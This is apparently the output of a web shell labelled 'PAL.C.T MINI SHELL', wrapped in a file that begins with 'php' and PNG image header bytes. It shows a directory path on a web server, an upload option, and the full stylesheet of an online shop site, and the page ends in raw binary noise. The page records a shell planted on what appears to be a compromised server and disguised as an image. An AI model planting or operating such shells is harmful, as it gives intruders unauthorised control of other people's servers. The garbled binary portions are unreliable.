php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/gs_sub/css/
upload
files >> /var/www/html/gs_sub/css/style.css

body{
	background: url('image/bg.png') repeat;
}

header {
/*    background: none repeat scroll 0 0 #68B6E6; */
    
}

.header{
	background: url('image/bg-header1.jpg') no-repeat scroll 0 0 rgba(0, 0, 0, 0);
    /*border-bottom: 5px solid #014EA2; */
    height: 125px;
}
.menu{
    position: relative;
    left:10px;
    top:97px;
}
.menu a{
    color: #000;
    margin-right: 10px;
    padding: 5px;
    border-radius: 5px;
}
.menu a:hover{
    padding: 4px;
    border: #f0f0f0 1px solid;
    background: #fff;
    text-decoration: none;
}
.right-header{

    position: relative;
    right:0;
    top:-25px;
    
}
.right-header .link, .right-header .link a{
    color: #fff;
}

h3{
    text-transform: capitalize;
}

@media (min-width: 768px) and (max-width: 979px) { 
    .header{
        background: url('image/bg-header-kecil.png') no-repeat scroll 0 0 rgba(0, 0, 0, 0);
        border-bottom: 5px solid #014EA2;
        height: 125px;
    }
    .right-header{
        position: relative;
        right:0px;
        top:-25px;    
    }
}
     
@media (max-width: 767px) {
 .header{
        background: url('image/bg-header-kecil.png') no-repeat scroll 0 0 rgba(0, 0, 0, 0);
        border-bottom: 5px solid #014EA2;
        height: 125px;
    }
    .right-header{
        position: relative;
        right:0px;
        top:-25px;    
    }   

}
     
@media (max-width: 480px) {
    .header{
        background: url('image/bg-header-kecil.png') no-repeat scroll 0 0 rgba(0, 0, 0, 0);
        border-bottom: 5px solid #014EA2;
        height: 125px;
    }
    .right-header{
        position: relative;
        right:0px;
        top:-25px;    
    }

}

#logo {
    margin-bottom: 10px;
    margin-left: -10px;
}

#logo img {
	margin-bottom: 10px;
    margin-top: 15px;
}

/* Large desktop */
    @media (min-width: 1200px) { 
    	.container {
    		width: 960px;
    	}
     }

.navbar{
	margin: 8px 0 8px 0; 
}

.main-page{
	background: #fff;
}

.title{
    color: #063A83;
    font-size: 18px;
    font-weight: bold;
    text-shadow: 1px 1px #BABABA;
}

.title-produk {
    display: table;
    width: 100%;
    position: relative;
    text-align: center;
    background: url("image/bg-title-produk.png");
    height: 55px; 
    padding: 5px;
    text-transform: capitalize;
}
.text{
    display: table-cell;    
    vertical-align: middle;
    text-align: center;
    padding: 0;
    margin: 0;
}
.title-produk:hover{
	text-decoration: none;
	font-weight: bold;
    text-align: center;
    text-decoration: none;
    color: #fff;		

}

.list-produk{
	margin-bottom: 15px;
	text-align: center !important;
}

.list-produk a{
	font-weight: bold;
    text-align: center;
    text-decoration: none;
    color: #000;    
}
.list-produk a:hover{
    color: #000;
    font-weight: bolder;
}

.list-produk img{
	max-width: 100%;
    height: auto;
    max-height: 130px;
    padding: auto;
    min-width: 50%;
    min-height: 50%;

}
.img-place{
    height: 134px;
    text-align: center !important;    
}


p{
    padding: 10px;
}

.no-border {
    border: medium none !important;
    border-radius: 0;
    box-shadow: none;
}

.main-page{
	padding:10px;
}

.panel-primary a {
    color: #FFFFFF;
}
.panel-body h5 {
    background-color: #3156A3;
    border-bottom: thin solid #FFFFFF;
    color: #FFFFFF;
    display: block;
    font-family: 'Open Sans',Arial,sans-serif;
    margin: 0;
    padding: 10px 15px;
    text-transform: uppercase;
    transition: background 0.5s ease 0s;
}
.panel-body h5:hover {
    background-color: #0384CE;
    color: #FFFFFF;
}

footer{
	background: #0f0f0f;
    border-top: 5px solid #014EA2;
    color: #fff;
}

footer p{
	text-align: center;
}

.news_tittle {
    background: url("image/gray-bg.png") no-repeat;
    line-height: 1em;
    margin-bottom: 20px;
    text-align: left;
}

.news_tittle h4 {
    background: url("image/title-bg.png") repeat-x;
    color: #FFFFFF;
    display: inline-block;
    font-family: 'Open Sans',Arial,sans-serif;
    font-size: 14px;
    margin: 0;
    padding: 10px 15px 10px 45px;
    text-transform: uppercase;
}
h4 {
    text-transform: capitalize;
}
 /* Landscape phones and down */
    @media (max-width: 480px) { 
        .news_tittle {
    background: none;
}
     }

.harga-barang{
    margin: 3px;
}

.deskripsi{
    padding: 10px;
    border: dotted #333 thin;
    background: #f0f0f0;
}

.foto-home{
    margin-bottom: 10px;
    text-align: center;
}
.foto-home img{
    height: 130px;
    padding: auto;
    max-width: 100%;
    max-height: 130px;
}

.tampil_harga_1{
    text-decoration: line-through;
    color: red;
    font-size: 12px;
}

.red{
    color: red;
}

.form-login a{
    color: black;
    text-decoration: underline;
}

.link{
    float: right;
    font-size: 12px;
    padding-right: 0;
    margin-top: 10px;
}

.link a{
    color: #545454;
}
#search{
    float: right;
    position: absolute;
    top: 120px; 
    right: 0px;
}

#search input{
    background: none;
    border-radius: 2px;
    border-style: solid;
    border-width: 1px;
    box-shadow: 0 1px 2px #ffffff inset;
    font-size: 13px;
    font-style: italic;
    margin: 0 24px 0 0;
    padding: 4px 0 4px 10px;
    width: 100%;
    color: #fff;
}

#search input:focus {
    box-shadow: 0 0 8px rgba(0, 0, 0, 0.1);
    background: none repeat scroll 0 0 #FAFAFA;
    border-radius: 2px;
    border-style: solid;
    border-width: 1px;
    box-shadow: 0 1px 2px rgba(0, 0, 0, 0.05) inset;
    font-size: 13px;
    font-style: italic;
    margin: 0 24px 0 0;
    padding: 4px 0 4px 10px;
    text-shadow: 0 1px 0 #FFFFFF;
    width: 100%;
    color: #000;
}

.button-search {
    background: url("../image/button-search.png") no-repeat scroll center center rgba(0, 0, 0, 0);
    cursor: pointer;
    height: 24px;
    position: absolute;
    right: 5px;
    top: 3px;
    width: 28px;
    padding: 0 !important;
    color: #fff;
}

.title-kat{
    bottom: 0;
    left: 0;
    position: absolute;
    right: 0;
    margin-left: 19px;
    margin-right: 19px;
}

.title-kat-bg{
    background-color: #000000;
    bottom: 0;
    height: 100%;
    left: 0;
    opacity: 0.5;
    position: absolute;
    right: 0;
    top: 0;
    width: 100%;
}

.text-kategori{
    color: #FFFFFF;
    font-size: 14pt;
    line-height: 1.1;
    padding: 12px 16px 12px 16px;
    position: relative;
    text-align: center;
}

/* Portrait tablet to landscape and desktop */
    @media (min-width: 768px) and (max-width: 979px) { 

.title-kat{
    margin-left: 23px;
    margin-right: 23px;
}

.text-kategori{
    font-size: 12pt;
    padding: 8px 13px 8px 13px;
}

     }
/* Landscape phone to portrait tablet */
    @media (max-width: 767px) { 
        .title-kat{
            margin-left: 23px;
            margin-right: 23px;
        }

        .text-kategori{
            font-size: 10pt;
            padding: 8px 13px 8px 13px;
        }
     }
     
    /* Landscape phones and down */
    @media (max-width: 480px) { 
        .title-kat{ 
            margin-left: 23px;
            margin-right: 23px;
        }

        .text-kategori{
            font-size: 10pt;
            padding: 8px 13px 8px 13px;
        }
     }

.kategori {
    line-height: 1em;
    margin-bottom: 25px;
    text-align: left;
}

.kategori a {
    background: url("image/bg-title.png") repeat-x;
    color: #FFFFFF;
    display: block;
    font-family: 'Open Sans',Arial,sans-serif;
    font-size: 14px;
    margin: 0;
    padding: 10px 15px;
    text-transform: uppercase;
    font-style: none;
    border: #fff solid thin;
}
.kategori a:hover {
   border: #004e84 solid thin;
}

.keranjang-belanja-box{
    text-align: center;
    padding: 8px;
    border-radius: 8px;
    border: #fff solid 1px;
    margin-bottom: 8px;
    color: #fff;
}
.keranjang-belanja-box a{
    color: #fff;
}

#slider {
  position: relative;
  overflow: hidden;
  margin: 0px auto 20px auto;
  border-radius: 4px;
  border: #ccc solid thin;
}

#slider ul {
  position: relative;
  margin: 0;
  padding: 0;
  height: 200px;
  list-style: none;
}

#slider ul li {
  position: relative;
  display: block;
  float: left;
  margin: auto;
  padding: 10px;
  width: 100%;
  height: 300px;
  text-align: center;
}

#slider ul li img{
  max-height: 250px;
  max-width: 90%;
  
}

.pointer{
    cursor: pointer;
}

.s1, .s2, .s3{
    text-align: center;
    display: block;
    margin: auto;
}

@media only screen and (max-width: 767px) {
  .beli{
    padding: 15px;
    border-top: thick #014EA2 solid ; 
    margin-top: 15px;
    background-color: #f0f0f0;
  }

  .beli .harga{
    padding: 10px;

  }
  
  #slider {
    border-radius: 0px;  
  }

  #slider ul li {
    height: 350px;
  }

  .pos1, .pos2, .pos3{
    max-height: 100px;
}

  #slider ul li img{
    max-height: 280px;
    max-width: auto;
    margin: auto;
  }
}
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`